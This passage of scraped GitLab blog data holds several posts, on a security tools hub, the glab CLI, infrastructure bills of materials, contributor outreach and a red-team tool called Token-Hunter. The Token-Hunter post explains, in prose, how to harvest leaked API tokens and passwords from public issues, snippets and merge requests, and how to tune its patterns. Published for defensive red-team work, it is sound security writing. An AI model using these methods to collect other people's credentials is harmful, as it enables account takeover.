\n\nIn this interview, you'll learn how:\n\n* [GitLab CI/CD](https://about.gitlab.com/features/continuous-integration) helps the group build scalable open source projects\n* adopting GitLab's integrated analysis tools helped the organization deploy complex solutions without the [DevOps tax](https://about.gitlab.com/blog/too-many-toolchains-a-devops-platform-migration-is-the-answer/#eliminating-the-devops-tax)\n* GitLab serves as the foundation of the organization's approach to digital transformation\n\n## Watch the interview\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/0--qGhH-MBQ\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Learn more\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n",[9,267,1099],{"slug":3387,"featured":6,"template":689},"interview-the-open-group","content:en-us:blog:interview-the-open-group.yml","Interview The Open Group","en-us/blog/interview-the-open-group.yml","en-us/blog/interview-the-open-group",{"_path":3393,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3394,"content":3400,"config":3407,"_id":3409,"_type":14,"title":3410,"_source":16,"_file":3411,"_stem":3412,"_extension":19},"/en-us/blog/introducing-gitlabs-open-source-security-center",{"title":3395,"description":3396,"ogTitle":3395,"ogDescription":3396,"noIndex":6,"ogImage":3397,"ogUrl":3398,"ogSiteName":673,"ogType":674,"canonicalUrls":3398,"schema":3399},"Introducing GitLab’s Open Source Security Center","Our open source repository of projects designed to enhance security operations and risk management will help developers adapt faster, respond smarter, and defend better — 
together.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749661895/Blog/Hero%20Images/blog-image-template-1800x945__7_.png","https://about.gitlab.com/blog/introducing-gitlabs-open-source-security-center","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Introducing GitLab’s Open Source Security Center\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Salman Ladha\"},{\"@type\":\"Person\",\"name\":\"Joseph Longo\"}],\n        \"datePublished\": \"2025-03-04\",\n      }",{"title":3395,"description":3396,"authors":3401,"heroImage":3397,"date":3404,"body":3405,"category":865,"tags":3406},[3402,3403],"Salman Ladha","Joseph Longo","2025-03-04","Today, we’re excited to announce the launch of [GitLab’s Open Source Security Center](https://about.gitlab.com/security/open-source-resources/) — a central repository of security-focused projects developed by GitLab’s internal security team. These tools are designed to help developers, security practitioners, and organizations build safer, more secure software, and more resilient security programs.\n\nSecuring systems is an ongoing challenge for businesses as threat actors continually adapt to new technologies and find creative ways to exploit organizations. Not only are they evolving their tactics, techniques and procedures, but they’re also [collaborating through criminal networks](https://insights.blackhatmea.com/do-cybercriminals-collaborate-and-build-community/), sharing strategies, stolen data, and malicious tools to launch coordinated attacks at scale. \n\nAs these threats grow in complexity, community-driven collaboration is one of our most powerful defenses. It’s a notion we’ve long understood in security — that *defending against adversaries is a shared responsibility*. 
By working together as a community, we can accelerate our collective intelligence and stay ahead of adversaries.\n\nIn open-sourcing our security solutions, we aim to empower teams to adapt faster, respond smarter, and defend better — together.\n\n[![Open Source Security Center page image](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749674572/Blog/Content%20Images/Screenshot_2025-03-04_at_08.10.05.png)](https://about.gitlab.com/security/open-source-resources/)\n\n## Why open source security? \n\nAt GitLab, open source isn’t just part of our technology — it’s part of our [founding story](https://about.gitlab.com/company/).\n\nSince day one, we’ve championed the open source philosophy, believing that transparency, collaboration, and community-driven development are keys to building better software. Over the years, GitLab has fostered an open source community with more than [4,000 contributors](https://about.gitlab.com/community/contribute/) and has provided a comprehensive DevSecOps platform through its open source [Community Edition](https://about.gitlab.com/install/ce-or-ee/).\n\nWe’ve also been inspired by industry leaders like [Crowdstrike](https://opensource.crowdstrike.com/) and [Palo Alto Networks](https://www.paloaltonetworks.ca/prisma/cloud/open-source-projects), who have shown that open-sourcing security tools not only improves innovation but also strengthens the entire security ecosystem. Following in their footsteps, GitLab is committed to supporting the community by sharing tools, templates, and frameworks developed by our security teams.\n\n## Explore our featured open source security projects\n\nWe’re launching the Open Source Security Center with a range of projects designed to enhance security operations and risk management. 
Here are some of the featured projects:\n\n* **[StORM templates](https://gitlab.com/gitlab-security-oss/risk-mgmt/storm-templates/):** Streamline your security risk program with templates that standardize risk tracking and reporting.\n\n* **[GUARD Framework](https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/):** Automate response and detection with a detections-as-code approach that simplifies detection creation, maintenance, and alert routing.  \n\n* **[GitLab CIS Benchmark Scanner](https://about.gitlab.com/blog/new-cis-gitlab-benchmark-scanner-boosts-security-and-compliance/):** Improve your project’s security posture by auditing against the Center for Internet Security GitLab Benchmark.\n\nWhether you’re a security engineer, researcher, or developer, your expertise and contributions are invaluable. Join us in strengthening the security ecosystem and collaborating with a community dedicated to making software safer for everyone.\n\n> [Explore GitLab’s Open Source Security Center](https://about.gitlab.com/security/open-source-resources/) and contribute to the next chapter of open source security. 
\n\n## Learn more\n\n- [New CIS GitLab Benchmark scanner boosts security and compliance](https://about.gitlab.com/blog/new-cis-gitlab-benchmark-scanner-boosts-security-and-compliance/)\n- [GitLab introduces new CIS Benchmark for improved security](https://about.gitlab.com/blog/gitlab-introduces-new-cis-benchmark-for-improved-security/)\n- [Unveiling the GUARD framework to automate security detections at GitLab](https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/)\n- [Automating cybersecurity threat detections with GitLab CI/CD](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/)",[865,930,9,867,1099],{"slug":3408,"featured":91,"template":689},"introducing-gitlabs-open-source-security-center","content:en-us:blog:introducing-gitlabs-open-source-security-center.yml","Introducing Gitlabs Open Source Security Center","en-us/blog/introducing-gitlabs-open-source-security-center.yml","en-us/blog/introducing-gitlabs-open-source-security-center",{"_path":3414,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3415,"content":3421,"config":3427,"_id":3429,"_type":14,"title":3430,"_source":16,"_file":3431,"_stem":3432,"_extension":19},"/en-us/blog/introducing-the-gitlab-cli",{"title":3416,"description":3417,"ogTitle":3416,"ogDescription":3417,"noIndex":6,"ogImage":3418,"ogUrl":3419,"ogSiteName":673,"ogType":674,"canonicalUrls":3419,"schema":3420},"Put `glab` at your fingertips with the GitLab CLI","We just adopted the `glab` project. 
Here's what's next and how to contribute!","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682539/Blog/Hero%20Images/newcli.png","https://about.gitlab.com/blog/introducing-the-gitlab-cli","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Put `glab` at your fingertips with the GitLab CLI\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Kai Armstrong\"}],\n        \"datePublished\": \"2022-12-07\",\n      }",{"title":3416,"description":3417,"authors":3422,"heroImage":3418,"date":3424,"body":3425,"category":299,"tags":3426},[3423],"Kai Armstrong","2022-12-07","\n\nWe want to integrate GitLab with the tools our developers already use and love. This mission drove us to [adopt GitLab Workflow for VS Code](/blog/use-gitlab-with-vscode/) two years ago and we’ve been iterating on it ever since (spoiler alert: it is an integral part of our [future Web IDE](/blog/the-future-of-the-gitlab-web-ide/)). As we thought about potential next projects, we considered that the common denominator for developers, regardless of their choice of editor, is their terminal.\n\nThis led us to our next charter: to bring GitLab to the CLI to continue streamlining workflows for developers between their most used technologies.\n\nSimilar to our work with VS Code, we wanted to integrate the GitLab DevSecOps platform into all stages of the code writing process. At GitLab, we’re [dedicated to open source](/handbook/engineering/open-source/#we-believe-in-open-source) and we value building in public. 
It's this commitment to open source and collaboration that helped us take the first step in this project: looking to our community to see if we could partner with them on an existing open source project to bring the CLI to developers faster.\n\n## Improving GitLab’s native CLI experience\n\nI’m happy to share that we’ve adopted the open source project [`glab`](https://gitlab.com/gitlab-org/cli), which will form the foundation of GitLab’s native CLI experience. The GitLab CLI brings GitLab to your terminal, next to [where you’re already working](https://about.gitlab.com/direction/create/editor_extension/#where-we-are-headed) with Git and your code, without switching between applications and browser tabs.\n\n![glab issue list](https://about.gitlab.com/images/blogimages/glabgettingstarted.gif)\n\n### Efficiency at your fingertips\n\nThis integration means developers can now achieve the following tasks without ever leaving the terminal:\n\n- Review issues assigned to you.\n- Create branches and merge requests for those issues.\n- Check the status of pipelines.\n- Approve and merge work.\n\nToo excited? Need a tl;dr RIGHT NOW? We have [GitLab CLI installation](https://gitlab.com/gitlab-org/cli#installation) instructions waiting for you! When setting up [authentication](https://gitlab.com/gitlab-org/cli#authentication), we’ve partnered with 1Password to support their new [Shell Plugins](https://blog.1password.com/shell-plugins/) making it even easier to authenticate your session and keep your credentials secure.\n\n## How did we get here?\n\nMore than two years ago, [Clement Sam](https://gitlab.com/profclems) (a [GitLab Hero](/community/heroes/)) began work on `glab` because he wanted a tool that made his workflow easier and saved time by avoiding the need to switch between browser tabs, IDE and terminal. He initially shared the script with some of his colleagues who also found it helpful. 
Ultimately, Clement made the decision to open source it and since then over 80 other [contributors](https://github.com/profclems/glab/graphs/contributors) have continued to build on the tool, adding commands to interact with merge requests, issues, pipelines, and more.\n\nWe heard about  `glab` from Clement back in 2020, when the project was still early in its life cycle. We were excited about the area, but couldn’t commit at the time to giving it the long-term support it deserved. Fast forward to 2022. We felt it made sense to check in with Clement to see how the project was progressing. After a few conversations, everyone involved felt that GitLab would be a great home for long-term support and community contributors. We [adopted the project](https://github.com/profclems/glab/issues/983).\n\n## Providing a seamless transition\n\nOver the past several months, we’ve been [transitioning](https://gitlab.com/groups/gitlab-org/-/epics/7514) the project to GitLab. During the transition we’ve learned a lot about what it takes to migrate an active project to new tooling. Our efforts to adapt [GitHub Actions to GitLab CI](https://gitlab.com/groups/gitlab-org/-/epics/7784) have given us great insights into that process as users, and something we’ll be looking to share more about in a future post. We also needed to unwind some previous documentation changes by [converting them back to Markdown](https://gitlab.com/gitlab-org/cli/-/issues/1010), for compatibility with the rest of GitLab’s internal processes.\n\nFurthermore, we knew we needed to provide users with a secure experience. Prior to adoption and launch, our application security team reviewed the project and provided feedback to ensure `glab` was safe, secure, and ready for more users. \n\nWith everything ready to go, we worked across the ecosystem to [update distribution methods](https://gitlab.com/groups/gitlab-org/-/epics/8251) to point to [the new repository](https://gitlab.com/gitlab-org/cli). 
Our goal was to provide a seamless transition for contributors to continue working, and for users to continue receiving updates.\n\n## Strengthened by community\n\nIt’s taken a small army of people to make the adoption of `glab` complete. A special thanks to [Gary](https://gitlab.com/garyh) who stepped up to lead the engineering efforts on our side. He’s been wonderfully supported by [Kerri](https://gitlab.com/kerrizor), [Tomas](https://gitlab.com/viktomas), and many others inside of GitLab who have had a passion for this project. Our external community has also come along for the ride. We’ve had [over 35 community contributions](https://gitlab.com/gitlab-org/cli/-/merge_requests?scope=all&state=all&label_name%5B%5D=Community%20contribution), ranging from first-time contributors to seasoned `glab` contributors. (Including Clement, who remains active in the project!).\n\n[GitLab CLI v1.24.1](https://gitlab.com/gitlab-org/cli/-/releases/v1.24.1) contains over 40 new features, bug fixes, security fixes and many more improvements since the last release. You can see the full [changelog](https://gitlab.com/gitlab-org/cli/-/releases/v1.24.1#changelog) on our releases page. Thank you to everyone who’s contributed to make all of this possible.\n\n## Want to get started now?\n\nIf you’re on macOS (and have [Homebrew](https://brew.sh/) installed) the fastest way to get started is by running:\n\n```\nbrew install glab\n```\n\nThis will install the latest version of the GitLab CLI and immediately make it available for you. Not on macOS? We have [installation instructions](https://gitlab.com/gitlab-org/cli#installation) for [Windows](https://gitlab.com/gitlab-org/cli#windows) and [Linux](https://gitlab.com/gitlab-org/cli#linux) too. \n\nAs part of getting things set up, you’ll need to set up the CLI to use a personal access token for [authentication](https://gitlab.com/gitlab-org/cli#authentication). You can do this with the `glab auth login` command and follow the prompts. 
Alternatively, you can use 1Password Shell Plugins to authenticate your session. With this feature, you can: \n\nSecure your personal access tokens in encrypted 1Password vaults.\nAuthenticate specific terminal sessions to access those tokens by scanning your fingerprint or using other biometrics. \n\nThis approach eliminates the need to type tokens or passwords into the terminal while removing plaintext keys from your disk. Plus, as you work across devices or environments, your key moves with you in 1Password, reducing setup time and simplifying collaboration. [Check out the 1Password documentation to get started.](https://developer.1password.com/docs/cli/shell-plugins/gitlab/).\n\n![1Password documentation](https://about.gitlab.com/images/blogimages/1passworddocumentation.png)\n\n\n## What are we doing next?\n\nNow that we’ve officially released the GitLab CLI, we’re going to spend some time taking a closer look at the issue backlog. We want to learn what the community is looking for in a CLI tool, and where opportunities exist to extend capabilities further into developer workflows. You’ll see the GitLab team more involved in discussing feature proposals and triaging bugs as we continue to ramp up on the project.\n\n## What do you want to see?\n\nThe GitLab CLI was born out of the community, and we want to continue collaborating with all of you in its future direction. 
If you have ideas for new features or encounter a bug, [open an issue](https://gitlab.com/gitlab-org/cli) and let us know or – in true GitLab form – [everything starts with a merge request](https://gitlab.com/gitlab-org/cli).\n",[1495,9,282],{"slug":3428,"featured":6,"template":689},"introducing-the-gitlab-cli","content:en-us:blog:introducing-the-gitlab-cli.yml","Introducing The Gitlab Cli","en-us/blog/introducing-the-gitlab-cli.yml","en-us/blog/introducing-the-gitlab-cli",{"_path":3434,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3435,"content":3441,"config":3446,"_id":3448,"_type":14,"title":3449,"_source":16,"_file":3450,"_stem":3451,"_extension":19},"/en-us/blog/introducing-the-infrastructure-bill-of-materials",{"title":3436,"description":3437,"ogTitle":3436,"ogDescription":3437,"noIndex":6,"ogImage":3438,"ogUrl":3439,"ogSiteName":673,"ogType":674,"canonicalUrls":3439,"schema":3440},"Introducing the infrastructure bill of materials","Pair IBoMs and SBOMs for a more secure software supply chain.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671160/Blog/Hero%20Images/ibom.jpg","https://about.gitlab.com/blog/introducing-the-infrastructure-bill-of-materials","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Introducing the infrastructure bill of materials\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Cindy Blake\"}],\n        \"datePublished\": \"2022-09-22\",\n      }",{"title":3436,"description":3437,"authors":3442,"heroImage":3438,"date":3443,"body":3444,"category":865,"tags":3445},[2407],"2022-09-22","\nAll eyes are on software supply chain security and organizations are busily generating software bills of materials, or SBOMs. But many are leaving out an equally critical part of software supply chain security: their infrastructure. 
GitLab has partnered with Firefly to help DevOps teams create bills of materials across the entire cloud footprint. \n \nThe SBOM, which is an ingredient list that identifies third-party and open source code used within software (a.k.a. dependencies), came into the spotlight with the U.S. Executive Order on \"Improving the Nation's Cybersecurity\" and its resulting [NIST guidelines to secure the software supply chain](/blog/comply-with-nist-secure-supply-chain-framework-with-gitlab/).\n \nWhile SBOMs begin to peel back the layers on risky code using elements such as [composition analysis](/handbook/engineering/development/sec/secure/composition-analysis/) to scan for dependencies in containers, more attention must be paid to how cloud infrastructure, a critical part of the software development lifecycle, is managed and secured.\n \n## Assessing cloud infrastructure\n \nWhen people think about software integrity, they tend to think about applications. Yet with the rise of cloud computing, cloud native applications, and modern CI/CD pipelines, there is a considerable amount of code used to automate how infrastructure resources are provisioned, secured, and consumed. In fact, the cloud is defined using [infrastructure-as-code](/blog/fantastic-infrastructure-as-code-security-attacks-and-how-to-find-them/) (IaC), and most of the power attributed to applications relies on infrastructure capabilities, configurations, permissions, and relations. Understanding an application's relationship with the underlying infrastructure and how it is configured is just as important to supply chain security as understanding an application’s usage of third-party and open source code. \n \nThe challenge is that it’s not easy to do. This infrastructure software, often referred to as cloud assets, includes resources provided by cloud services, orchestrators like Kubernetes, and even policies. 
Google Cloud nicely [lists its assets](https://cloud.google.com/asset-inventory/docs/supported-asset-types) as an example. Increasingly, companies are [using more than one cloud service provider](https://www.cncf.io/wp-content/uploads/2022/02/CNCF-AR_FINAL-edits-15.2.21.pdf) for different workloads, and each service uses different constructs. Even with a single provider, many companies organize their applications into multiple AWS accounts or GCP projects. It can be difficult to see what assets an organization has across these silos.\n \n## Enter the IBoM\n \nDespite these challenges, just as an organization needs to list all the application code dependencies, it also needs to list all the infrastructure components across multiple clouds, multiple accounts, and Kubernetes. Together, they make up the infrastructure bill of materials, or IBoM. These assets must be tracked and managed closely as they can be changed and, if not properly governed, can wreak havoc on the stability and consistency of an application’s performance, creating troubleshooting problems.\n \nThe IBoM is the first key to understanding an organization’s complete cloud footprint and being able to better secure the software supply chain.\n \nThe second key, and equally important, is managing the integrity of that IBoM. The configuration of cloud assets such as S3 buckets, identity and access management roles, EC2, database instances, and Kubernetes clusters determines access to data and what resources are available to an application. The configuration also impacts the stability of the infrastructure upon which the applications depend.\n \nWith the surge of cloud native applications, the burden of managing this infrastructure has increased exponentially. To meet the challenge of governing this complex infrastructure, organizations have been codifying these cloud assets into IaC using tools like Terraform, Pulumi, and Helm. 
Once codified as IaC, they can utilize version control and be governed with the same rigor as application software – all within a DevOps platform like GitLab. This approach is typically called [GitOps](/topics/gitops/). It's important for the security of your supply chain because it provides visibility, traceability, and policy enforcement for your infrastructure software.\n \n## How Firefly and GitLab work together\n \n[Firefly’s Cloud Asset Management solution](https://www.gofirefly.io/) can help GitLab’s DevOps platform manage both application software and cloud infrastructure software - across an organization’s cloud footprint. Firefly essentially extends the GitLab [GitOps solution](/solutions/gitops/) to cover even more of your cloud and provides additional governance via drift detection and remediation.\n\nFirst, Firefly discovers all of an organization’s cloud infrastructure across AWS accounts, GCP projects, Kubernetes, and even SaaS application environments, providing an IBoM in one dashboard. Unmanaged and misconfigured environments are identified for DevOps. With a click, these unmanaged cloud assets are automatically coded into IaC such as Terraform or Helm, potentially saving engineering time and getting DevOps teams toward a more fully managed software supply chain.\n\nNow, as IaC, these cloud assets can be monitored for changes. Firefly continuously assesses drift between an organization’s desired IaC state and its actual cloud and Kubernetes configurations, helping ensure these configurations and policies remain enforced. 
When changes are made to either IaC or the underlying infrastructure, Firefly automatically creates a GitLab merge request to ensure changes to an organization’s infrastructure software are managed using DevOps automated CI/CD.\n \nFirefly and GitLab together enable DevOps teams to add to the security of their supply chains by generating IBoMs, applying version control, automation, and governance to the applications and infrastructure upon which they rely. Learn more about the [Firefly/GitLab integration](https://www.gofirefly.io/partners/gitlab) and give Firefly a try. \n\n\n_Blake is vice president of marketing at Firefly._\n\nCover image by [Edge2Edge Media](https://unsplash.com/photos/t1OalCBUYRc) on Unsplash\n{: .note}\n",[865,231,9],{"slug":3447,"featured":6,"template":689},"introducing-the-infrastructure-bill-of-materials","content:en-us:blog:introducing-the-infrastructure-bill-of-materials.yml","Introducing The Infrastructure Bill Of Materials","en-us/blog/introducing-the-infrastructure-bill-of-materials.yml","en-us/blog/introducing-the-infrastructure-bill-of-materials",{"_path":3453,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3454,"content":3460,"config":3466,"_id":3468,"_type":14,"title":3469,"_source":16,"_file":3470,"_stem":3471,"_extension":19},"/en-us/blog/introducing-token-hunter",{"title":3455,"description":3456,"ogTitle":3455,"ogDescription":3456,"noIndex":6,"ogImage":3457,"ogUrl":3458,"ogSiteName":673,"ogType":674,"canonicalUrls":3458,"schema":3459},"Introducing Token-Hunter","Our red team has created a new tool to find sensitive data in the vast, wide-open.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679669/Blog/Hero%20Images/lightscape-Bsw6l6e01Rw-unsplash.jpg","https://about.gitlab.com/blog/introducing-token-hunter","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Introducing Token-Hunter\",\n        \"author\": 
[{\"@type\":\"Person\",\"name\":\"Greg Johnson\"}],\n        \"datePublished\": \"2019-12-20\",\n      }",{"title":3455,"description":3456,"authors":3461,"heroImage":3457,"date":3463,"body":3464,"category":865,"tags":3465},[3462],"Greg Johnson","2019-12-20","\n\nWe operate business at GitLab in a [“public by default”](https://handbook.gitlab.com/handbook/values/#public-by-default) mindset so other people can benefit from our transparent business practices. Defaulting to public sharing also means we store massive amounts of data in a public format by design. Much of what we do as a company takes the form of a GitLab issue and is open for the world to see, including those individuals with nefarious goals. Naturally, for a [Red Team](/handbook/security/threat-management/red-team/), we’re curious about what all of this public information could do to aid someone intent on attacking GitLab. We started our investigation by identifying those secrets that are unintentionally shared across the assets we make public like issues, issue discussions, merge requests, merge request discussions, and snippets. There was no tooling available that accomplished what we set out to do, so we developed it ourselves and just released it: [Token-Hunter](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter).\n\n### Background\n\nAPI tokens are a keystone in the development world. They facilitate important functionality not only in the software developers build, but also in the deployment, maintenance, integration, and security of both closed and open source projects. Many companies providing services on the internet offer API tokens in multiple flavors that allow interaction with their systems, as does GitLab. Ideally, these tokens offer configurable access control to otherwise closed systems allowing you to impersonate a user’s session and access raw data. 
Developers, DevOps professionals, infrastructure professionals and the like often depend on API tokens to do their job successfully.\n\nIt’s a common and understandable mistake to make a commit to a Git repository containing one of these tokens when building software in a shared environment. Moving quickly, trying to support your fellow developer, and generally working quickly to get things done efficiently can lead to mistakes made under pressure, which can happen to us all. Popular tools that search for these commits like [gitrob](https://github.com/michenriksen/gitrob), [TruffleHog](https://github.com/dxa4481/truffleHog), [gitleaks](https://github.com/zricethezav/gitleaks), and even GitLab’s own [SAST project](https://docs.gitlab.com/ee/user/application_security/sast/) can find leaked tokens given proper configuration. Our Red Team had early success leveraging these known techniques, tactics, and procedures (TTPs).\n\nThe tools referenced above are fantastic at finding secrets unintentionally left in source code. However, it's also a common mistake to submit sensitive data like API tokens, usernames, and passwords to public locales like [GitLab snippets](https://docs.gitlab.com/ee/user/snippets.html), [issues](https://docs.gitlab.com/ee/user/project/issues/), [issue discussions](https://docs.gitlab.com/ee/api/discussions.html), [merge requests](https://docs.gitlab.com/ee/user/project/merge_requests/), and [merge request discussions](https://docs.gitlab.com/ee/api/discussions.html). Sharing this type of information by accident can happen easily when attempting to share relevant information to facilitate a public support request as we often do at GitLab for many different products. Though most people know not to post sensitive information in a public place directly, mistakes do happen, sometimes shortcuts are taken, logs get shared, configuration files get dropped, and information inadvertently gets leaked and leveraged.  
More often than not, these areas of exposure are forgotten, but not by attackers.\n\n### Exploring the wide-open\n\nToken-Hunter is intended to complement tools like gitrob, gitleaks, TruffleHog, and others. It can be used if you’re hosting your groups and projects on GitLab.com, or on a self-managed GitLab instance of your own. We created Token-Hunter to support the following features:\n\n- **Search GitLab issues and the related discussions for sensitive data.** GitLab issues and comments are a primary method of sharing information and resolving support issues. They typically contain shared log data, configuration files, copy/pasted [source code](/solutions/source-code-management/) examples, and discussions by both GitLab employees and customers, and are therefore likely to contain sensitive data.\n- **Search GitLab snippets for sensitive data.** These are small, URL-addressable chunks of code or text intended to be shared between GitLab users or served directly in source code. They are most often used to share small bits of configuration data, JavaScript source code, example code in any language, or log data. Therefore, they can likely contain sensitive information like usernames and passwords, API tokens, etc.\n- **Search GitLab merge requests and discussions for sensitive data.** Merge requests and comments are, more often than not, how public open source projects receive changes from the community.  At GitLab, merge requests facilitate everything from [handbook updates](https://about.gitlab.com/company/culture/all-remote/handbook-first-documentation/) to [GitLab runner](https://gitlab.com/gitlab-org/gitlab-runner) code changes for both internal employees and external contributors.  Descriptions and discussions on these assets can include log data, system access instructions, and the like.\n- **List all of the projects associated with a group.** This is helpful to quantify the problem and understand where the search will start. 
Optionally, you can include members’ projects in the search to expand the organizational scope similar to gitrob. Starting at different points in the project after you understand your target more completely can yield very different results.\n- **Proxy all traffic from the tool.** Token-Hunter accepts arguments for an HTTP proxy server and self-signed certificate to decrypt TLS traffic. GitLab’s Red Team used this feature to record traffic pattern examples to the Security Operations team in support of defensive strategy development. This feature is also handy for debugging by examining the traffic the tool generates. [Burp Suite](https://portswigger.net/burp/communitydownload) and [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) are two popular tool choices for proxying traffic locally and can be configured with a self-signed certificate to decrypt TLS traffic.\n\nFor full details on using the tool and the functionality of each of its available arguments, visit [the Token-Hunter project page](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/tree/master) on GitLab.\n\n### Taming the wild... mostly\n\nHitting an API to gather large amounts of raw data is daunting. Internet connections flake out, servers need maintenance, rate limits get hit, WiFi drops, performance degrades, timeouts happen, and you end up with a headache attempting to simply get the data you’d like to analyze. To counter some of these issues as pragmatically as possible, two simple algorithms were applied: request retries and dynamic page-size reduction. Request retries simply retries a failed request after a few seconds. The tool will retry a failed request twice, each after a four-second delay with a four-second backoff. In other words, the first retry will occur four seconds after the initial failed request. The second retry will occur eight seconds after the first failed retry attempt. 
If each of these retry attempts fails, the tool then attempts to reduce the paging size in order to complete the request. Reducing the page size reduces the number of records the request needs to return lessening the likelihood of a timeout. *Though simple, these two algorithms allowed the tool to reliably pull data for nearly 1.3 million individual GitLab assets with only three recorded request errors resulting in over 1600 pattern matches.*\n\n### More to explore\n\nThe ability to search discussions and other popular channels where sensitive data is likely to be shared is the key benefit of the Token-Hunter tool over other related tooling. The Red Team plans to continue iterating to support our operations, including adding support for more assets such as [merge requests](https://docs.gitlab.com/ee/user/project/merge_requests/), commit discussions, and [epics](https://docs.gitlab.com/ee/user/group/epics/). We learned during our operation that the specifics of the regular expressions we used in relation to the context in which we were searching (posted log data format, configuration file format, code structure, etc.) largely determined our level of success. It can be necessary to tune these expressions depending on your environment and context. To start, we made a few adjustments to [TruffleHog’s regular expressions](https://github.com/dxa4481/truffleHogRegexes) to add coverage for GitLab-specific token formats. However, there’s still much room for improvement depending on your environment and objective.\n\nLooking for a specific password for a user name? Trying to find all mentions of a specific server DNS name or IP? Expecting a specific log format that has the potential to contain an API token? 
Tune [the regular expressions](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/blob/master/regexes.json), and you just may find what you’re looking for.\n\n### We want your ideas and contributions\n\nThere is still plenty to be done and we welcome community contributions and ideas. If the tool is helpful to you in defense of your infrastructure and you’d like to contribute, [there are instructions in the README.md](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter#contributing) on how to get started. If you’re not sure what to do, pick an issue out of [our issue list](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/issues) or add to the existing discussions.  I'd like to extend a special thank you to GitLab user [Ohad Dahan](https://gitlab.com/ohaddahan) for his many contributions to this and other GitLab projects.  These types of contributions are paramount to the continued success of open source projects.\n\nSome of the ideas we’re currently pursuing are:\n\n- **Better output formatting:** We’d like to standardize output to an industry accepted, standard format that allows support for findings verification. A simple CSV file might be the first step.\n- **Real-time reporting of findings:** Currently, the tool gathers data first, then reports on the findings, leaving you in way too much suspense for way too long. Reporting findings as they are found allows verification to begin earlier during a long-running execution.\n- **Data persistence:** Querying the API is the costliest part of inspecting GitLab assets for sensitive data. Persisting that data from an execution would:\n  - Reduce the need to query the API again after tuning your regular expressions. During our operation, we often needed to make changes to the regular expressions based on what we were seeing in the matches. This was virtually impossible given the amount of data necessary to pull.\n  - Allow for long-running executions to be paused and resumed. 
Executions against larger groups can take several hours and would sometimes require a restart during our operation.\n  - Maintain a permanent record of findings should they be edited following a found match. During our exercise, there were a few occasions where matches were found that looked to be legitimate, but could not be verified as the asset was modified post-discovery.\n\nWe have learned a lot from this initial attempt at gathering OSINT from rather unique and unorthodox locations, but this exercise was just a start. We hope you find the tooling useful and if you have questions or ideas to share please reach out through [email](mailto:redteam@gitlab.com), through our [issue board](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/-/boards), or [on Twitter](https://twitter.com/code_emitter). Happy hacking!\n\nPhoto by [Lightscape](https://unsplash.com/@lightscape?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/photos/Bsw6l6e01Rw).\n{: .note}\n",[865,3091,9],{"slug":3467,"featured":6,"template":689},"introducing-token-hunter","content:en-us:blog:introducing-token-hunter.yml","Introducing Token Hunter","en-us/blog/introducing-token-hunter.yml","en-us/blog/introducing-token-hunter",{"_path":3473,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3474,"content":3479,"config":3484,"_id":3486,"_type":14,"title":3487,"_source":16,"_file":3488,"_stem":3489,"_extension":19},"/en-us/blog/join-the-gitlab-community",{"title":3475,"description":3476,"ogTitle":3475,"ogDescription":3476,"noIndex":6,"ogImage":2028,"ogUrl":3477,"ogSiteName":673,"ogType":674,"canonicalUrls":3477,"schema":3478},"Join the GitLab Code Contributor Community!","How we're working to make contributions easier and more rewarding for the GitLab community.","https://about.gitlab.com/blog/join-the-gitlab-community","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        
\"headline\": \"Join the GitLab Code Contributor Community!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-08-13\",\n      }",{"title":3475,"description":3476,"authors":3480,"heroImage":2028,"date":3481,"body":3482,"category":10,"tags":3483},[704],"2018-08-13","\nThere are [over 2,000 code contributors to GitLab](http://contributors.gitlab.com/) today and we want to welcome more contributors to the growing community.\n\nHaving been involved in other open source projects, I know how exciting it is to collaborate in an open community and work with passionate people from different parts of the world. I recently joined GitLab to work with our community of contributors, and I wanted to share a list of activities that I’m planning to help grow the community:\n\n## 1. Streamline onboarding documentations\n\nSo that it’d be easier for people to get started. There are already some initiatives on the way, such as this [merge request from a community member](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/20682).\n\n## 2. Proactively reach out to first-time contributors\n\nI want to start congratulating new contributors who successfully complete their first merge request. Stay tuned for new swag and opportunities to be paired with mentors who are experienced GitLab community members.\n\n## 